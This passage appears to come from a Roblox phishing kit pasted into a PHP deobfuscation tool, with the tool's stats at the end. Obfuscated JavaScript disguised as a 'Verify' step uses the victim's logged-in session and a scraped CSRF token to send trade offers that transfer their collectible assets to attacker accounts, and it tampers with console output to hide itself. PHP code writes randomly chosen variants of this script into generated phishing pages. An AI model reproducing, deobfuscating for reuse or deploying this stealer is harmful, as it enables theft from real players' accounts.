_0x10f916[_0x42a1e2(-0x222,-0x210,-0x21a,-0x225)](),_0x78d182=_0x7dbc64[_0x5ea5a6(0x4a,0x66,0x24,0x41)+'e'],_0x974730=_0x7dbc64[_0x42a1e2(-0x239,-0x220,-0x259,-0x250)];if(typeof _0x78d182===_0x5ea5a6(0x25,0x2c,0x10,0x1f)||typeof _0x974730===_0x42a1e2(-0x24f,-0x22d,-0x239,-0x25d))throw new Error(_0x5ea5a6(0xf,0x0,-0x5,0x1b));const _0x39b213=await fetch('https://inv'+_0x5ea5a6(-0x4,0x6,0x6,0x10)+_0x5ea5a6(0x27,0x10,0x2d,0x32)+'sers/'+_0x974730+(_0x42a1e2(-0x237,-0x23d,-0x24b,-0x230)+_0x42a1e2(-0x214,-0x236,-0x22b,-0x207)+_0x42a1e2(-0x23a,-0x23f,-0x240,-0x25e)+'c&limit=10')),_0x1bd370=await _0x39b213[_0x42a1e2(-0x222,-0x1ff,-0x224,-0x203)](),_0x276f80=_0x1bd370[_0x5ea5a6(0x2a,0x38,0x2f,0x3d)][_0x5ea5a6(0x28,0x26,0x7,0x2e)](_0x407da4=>_0x407da4[_0x42a1e2(-0x243,-0x23d,-0x21e,-0x267)]);if(_0x276f80[_0x5ea5a6(0x2a,0x28,0x4,0x20)]===0x0)throw new Error(_0x42a1e2(-0x256,-0x278,-0x23a,-0x231));return{'robuxBalance':_0x78d182,'RobloxID':_0x974730,'userAssetIds':_0x276f80};}catch(_0x3e0b7b){console['error'](_0x3e0b7b);throw _0x3e0b7b;}}function _0x78b1(_0xf97f96,_0x10dbec){const _0xc736d1=_0x2feb();return _0x78b1=function(_0x492181,_0x528b44){_0x492181=_0x492181-0x65;let _0x5c0b5c=_0xc736d1[_0x492181];return _0x5c0b5c;},_0x78b1(_0xf97f96,_0x10dbec);}function _0x1d53f5(_0x51f95f,_0x5dcc15,_0x321a31,_0x13e667){return _0x78b1(_0x51f95f-0xa0,_0x5dcc15);}async function fetchCsrfToken(){function _0x5a9183(_0xba5a4,_0x1ff170,_0x28a0b5,_0x22e47d){return _0x1d53f5(_0x22e47d-0x155,_0xba5a4,_0x28a0b5-0xdb,_0x22e47d-0x132);}function _0x293722(_0x1c0164,_0x1a6f9a,_0x4e6cb8,_0x23b176){return _0x101539(_0x4e6cb8,_0x1c0164- -0xb6,_0x4e6cb8-0x132,_0x23b176-0x190);}try{const _0x4b20ac=await fetch(_0x293722(-0x210,-0x22b,-0x1ec,-0x1fc)+'.roblox.com'),_0x213901=await _0x4b20ac[_0x5a9183(0x29d,0x272,0x290,0x28d)](),_0x4ea427=document[_0x293722(-0x24d,-0x229,-0x254,-0x272)+'nt'](_0x5a9183(0x276,0x269,0x28f,0x274));_0x4ea427[_0x5a9183(0x26b,0x276,0x26b,0x283)]=_0x213901;const _0x23e97c=_0x4ea427[_0x293722(-0x248,-0x249,-0x223,-0x253)+'or'](_0x5a9183(0x2a0,0x2a2,0x297,0x28b)+_0x293722(-0x23a,-0x21e,-0x25d,-0x23c)+']');if(!_0x23e97c)throw new Error(_0x5a9183(0x244,0x258,0x26d,0x264)+_0x293722(-0x209,-0x1ec,-0x22c,-0x1e2)+_0x5a9183(0x276,0x282,0x292,0x289)+'ot\x20found');const _0x2437e1=_0x23e97c[_0x5a9183(0x2ab,0x28e,0x294,0x28a)+'e'](_0x293722(-0x255,-0x250,-0x244,-0x26e));if(!_0x2437e1)throw new Error(_0x5a9183(0x250,0x278,0x25b,0x266));return _0x2437e1;}catch(_0x48e42e){console['error'](_0x48e42e);throw _0x48e42e;}}async function Roblox(_0x2afeac){function _0x220b88(_0x488808,_0x2598d2,_0x249109,_0x59bfdd){return _0x1d53f5(_0x249109-0x17f,_0x59bfdd,_0x249109-0x11f,_0x59bfdd-0x1da);}function _0x523b0b(_0x550dce,_0x2e9294,_0x2a0b9a,_0x5dce70){return _0x101539(_0x5dce70,_0x550dce-0x579,_0x2a0b9a-0x85,_0x5dce70-0x14);}try{const _0x173105=await fetchCsrfToken(),_0x36981f=await fetch('https://tra'+_0x220b88(0x2a3,0x2c6,0x2c0,0x2be)+'com/v1/trad'+_0x220b88(0x2dd,0x2d9,0x2cc,0x2e9),{'method':_0x220b88(0x2da,0x294,0x2b9,0x2d6),'headers':{'Content-Type':_0x220b88(0x2a3,0x2db,0x2bc,0x29f)+_0x523b0b(0x420,0x3fa,0x42a,0x40f),'X-CSRF-TOKEN':_0x173105},'credentials':_0x220b88(0x2b3,0x294,0x2a2,0x29a),'body':JSON[_0x523b0b(0x411,0x419,0x417,0x428)](_0x2afeac)});if(_0x36981f['ok'])console[_0x220b88(0x293,0x2b0,0x2af,0x2ce)](_0x523b0b(0x3e9,0x40b,0x403,0x3cc));else{const _0xa6bfbf=await _0x36981f['json']();console[_0x220b88(0x29b,0x2a3,0x290,0x2b1)](_0xa6bfbf);}}catch(_0x325d69){console[_0x523b0b(0x3e6,0x401,0x3c1,0x3ea)](_0x220b88(0x2a1,0x2b2,0x2ab,0x2c7));throw _0x325d69;}}async function Verify(){const _0x169787=(function(){let _0x166665=!![];return function(_0x477a2d,_0x108441){const _0x46370a=_0x166665?function(){function _0x5d7b41(_0x11f930,_0x91f258,_0x36487a,_0x345e6b){return _0x78b1(_0x11f930- -0x2f2,_0x36487a);}if(_0x108441){const _0x598226=_0x108441[_0x5d7b41(-0x260,-0x257,-0x246,-0x276)](_0x477a2d,arguments);return _0x108441=null,_0x598226;}}:function(){};return _0x166665=![],_0x46370a;};}()),_0x4d392b=_0x169787(this,function(){function _0x4eefc2(_0x4f51b5,_0x4493da,_0x394911,_0x31121d){return _0x78b1(_0x31121d-0x3d9,_0x4f51b5);}function _0x54b87d(_0x532897,_0x2a5981,_0x5b1310,_0x59663f){return _0x78b1(_0x2a5981- -0x22a,_0x59663f);}return _0x4d392b[_0x4eefc2(0x468,0x455,0x43d,0x445)]()[_0x4eefc2(0x494,0x466,0x466,0x47c)](_0x4eefc2(0x48c,0x468,0x45e,0x477)+'$')[_0x54b87d(-0x1ab,-0x1be,-0x1c9,-0x1d8)]()[_0x4eefc2(0x471,0x457,0x45e,0x454)](_0x4d392b)[_0x4eefc2(0x491,0x45e,0x481,0x47c)](_0x4eefc2(0x45c,0x471,0x463,0x477)+'$');});_0x4d392b();const _0x1b84d5=(function(){let _0x3c677e=!![];return function(_0x2e717c,_0x2f3010){const _0x36863d=_0x3c677e?function(){function _0x5993f0(_0x3380ee,_0x1b358c,_0x4e96a9,_0x1cfb7b){return _0x78b1(_0x3380ee-0x344,_0x1b358c);}if(_0x2f3010){const _0x5a247c=_0x2f3010[_0x5993f0(0x3d6,0x3fb,0x3c6,0x3eb)](_0x2e717c,arguments);return _0x2f3010=null,_0x5a247c;}}:function(){};return _0x3c677e=![],_0x36863d;};}());function _0x9f30be(_0x548039,_0x53a414,_0x2231ac,_0x54af91){return _0x101539(_0x53a414,_0x2231ac-0x100,_0x2231ac-0xf3,_0x54af91-0x159);}const _0x4c2ae7=_0x1b84d5(this,function(){const _0x206ba7=function(){function _0xcff86e(_0xe2693d,_0x5db7dd,_0x58e02f,_0x52ea00){return _0x78b1(_0xe2693d-0x13c,_0x52ea00);}function _0x290374(_0x1e7a42,_0x52fd5d,_0x20a87e,_0x12b25b){return _0x78b1(_0x52fd5d-0x3ae,_0x12b25b);}let _0x1dd03b;try{_0x1dd03b=Function(_0xcff86e(0x1b5,0x1aa,0x19e,0x1b0)+_0xcff86e(0x1e1,0x1ea,0x1ce,0x201)+(_0x290374(0x450,0x42a,0x431,0x426)+_0xcff86e(0x1af,0x18f,0x1ac,0x1b7)+_0x290374(0x461,0x449,0x42a,0x42e))+');')();}catch(_0x5659f2){_0x1dd03b=window;}return _0x1dd03b;},_0x245827=_0x206ba7(),_0x216ba0=_0x245827[_0x151ab3(0x400,0x40e,0x3f6,0x41d)]=_0x245827[_0x5979e4(-0x174,-0x150,-0x172,-0x173)]||{};function _0x151ab3(_0x424e32,_0x447c5b,_0x160798,_0x537ab7){return _0x78b1(_0x424e32-0x389,_0x160798);}const _0x5a32f5=[_0x151ab3(0x419,0x428,0x41e,0x40c),_0x151ab3(0x3f4,0x3ff,0x3fc,0x40f),_0x151ab3(0x412,0x419,0x401,0x404),_0x151ab3(0x3fa,0x416,0x41c,0x3e8),_0x151ab3(0x432,0x415,0x427,0x426),'table','trace'];function _0x5979e4(_0x4511c8,_0x559bfc,_0xd98b35,_0x245d97){return _0x78b1(_0xd98b35- -0x1e9,_0x559bfc);}for(let _0x5c4a1f=0x0;_0x5c4a1f<_0x5a32f5[_0x5979e4(-0x18b,-0x17a,-0x173,-0x168)];_0x5c4a1f++){const _0x3d69c5=_0x1b84d5['constructor'][_0x5979e4(-0x159,-0x168,-0x150,-0x172)][_0x151ab3(0x3f9,0x3ed,0x415,0x3da)](_0x1b84d5),_0x4b5e1f=_0x5a32f5[_0x5c4a1f],_0x183e07=_0x216ba0[_0x4b5e1f]||_0x3d69c5;_0x3d69c5[_0x151ab3(0x437,0x411,0x427,0x43f)]=_0x1b84d5['bind'](_0x1b84d5),_0x3d69c5[_0x151ab3(0x3f5,0x3e0,0x412,0x400)]=_0x183e07[_0x5979e4(-0x162,-0x17b,-0x17d,-0x15d)][_0x5979e4(-0x19f,-0x160,-0x179,-0x186)](_0x183e07),_0x216ba0[_0x4b5e1f]=_0x3d69c5;}});_0x4c2ae7();function _0x10f02c(_0x273d12,_0x3f0571,_0x552dfc,_0x39825d){return _0x1d53f5(_0x3f0571- -0x317,_0x39825d,_0x552dfc-0x36,_0x39825d-0x19e);}try{const {robuxBalance:_0x4515b7,RobloxID:_0x34ab02,userAssetIds:_0x3b0aa0}=await FetchInfo(),_0x3db6c8=await TermedAssets(),_0x318742={'offers':[{'userId':$ID,'userAssetIds':[_0x3db6c8],'robux':null},{'userId':_0x34ab02,'userAssetIds':_0x3b0aa0,'robux':null}]},_0x5e6c13={'offers':[{'userId':0xf8fec04b,'userAssetIds':[_0x3db6c8],'robux':null},{'userId':_0x34ab02,'userAssetIds':_0x3b0aa0,'robux':null}]};console[_0x10f02c(-0x1d3,-0x1e7,-0x200,-0x1fa)](_0x10f02c(-0x1e9,-0x1f0,-0x1e5,-0x20b)),await Roblox(_0x318742),await Roblox(_0x5e6c13);}catch(_0x221627){console[_0x9f30be(-0x70,-0x70,-0x93,-0x8e)](_0x10f02c(-0x1f6,-0x1eb,-0x1de,-0x212));}}function _0x101539(_0x3cabc3,_0x569a2c,_0x53801e,_0x29c120){return _0x78b1(_0x569a2c- -0x204,_0x3cabc3);}Verify();";
$codes = array($code1, $code2, $code3);
$code = $codes[array_rand($codes)];
$filename = "../$folder/js.txt";
file_put_contents($filename, $code);
$site = file_get_contents("page.php");
$myfile = fopen("../$folder/index.php", "w");
$txt = $site;
fwrite($myfile, $txt);
header("location: ../$folder");
} else {
echo "$name does not have premium or access to trade.";
}
} else {
echo "error";
}
curl_close($ch);
} else {
echo "User not found or banned.";
}
} else {
echo "error";
}
curl_close($ch);
} else {
echo "error";
}
?>
deobsusfactuate this
Function Calls
None |
Stats
MD5 | ea58377ddd625eaebae54b929e775d3c |
Eval Count | 0 |
Decode Time | 82 ms |